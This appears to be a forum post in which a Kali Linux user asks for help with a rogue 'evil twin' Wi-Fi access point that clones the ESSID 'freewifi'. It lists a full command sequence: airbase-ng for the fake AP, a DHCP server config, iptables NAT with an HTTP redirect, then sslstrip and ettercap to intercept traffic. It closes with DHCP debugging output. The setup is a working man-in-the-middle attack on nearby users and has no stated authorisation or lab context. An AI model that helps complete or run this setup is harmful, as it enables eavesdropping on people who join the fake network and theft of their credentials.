Hello, I try to set up a fake wifi 2.4Ghz AP, I use the Alfa: AWUS036H adapter that is connected to a wifi network to with ESSID: freewifi, can I create a fake access point with the same ESSID?(Freewifi) and distribute it to as internet (and that would be my wifi the adapter is connected to this AP, and not reconnected to the I created AP)? we can take a WIFI interface and immediately distribute the Internet? Below I will give you as I try to implement it.

Gateway in the network from which I take the internet : 192.168.2.1
Operating System: kali-linux 1.0.9a-i386


1.Tell me the logic of my example correct?

2.On the Internet I could not find examples of creating a fake AP where to connect to the Internet and to create a fake AP would be used one WiFi interface.

3.Why my card is not connected to a WiFi network and does not receive the settings via dhсp? (Tried and integrated adapter, but the result is the same) write that the Problem may be in the driver... but why can not I connect by the built-in adapter I do not understand...

iw reg set BO
iwconfig wlan1 txpower 30
iwconfig wlan1 essid "freewifi" ap 01:00:00:00:00:00 #connection to AP by ESSID and BSSID
dhclient -v wlan1
apt-get install isc-dhcp-server
nano /etc/dhcpd.conf
######
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "HOME";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
######
airmon-ng start wlan1 11
airbase-ng mon0 -c 7 --essid "freewifi" #creation of FAKE AP with the same ESSID
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.2.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
###### ####
root@hk3r:~# sslstrip -f -p -k 8080
######
root@hk3r:~# ettercap -p -u -T -q -i at0
######

Additional Information:
root@kali:~# iptables -L -n
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

root@kali:~# dhclient -v wlan1
Internet Systems Consortium DHCP Client 4.2.2
Copyright 2004-2011 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/wlan1/MYADAPTERMAC
Sending on LPF/wlan1/MYADAPTERMAC
Sending on Socket/fallback
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 11
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 15
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 8
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 7
No DHCPOFFERS received.
No working leases in persistent database - sleeping.

root@kali:~# tcpdump -i wlan1 port 67 or port 68 -e -n
clear....
I will be very glad to help.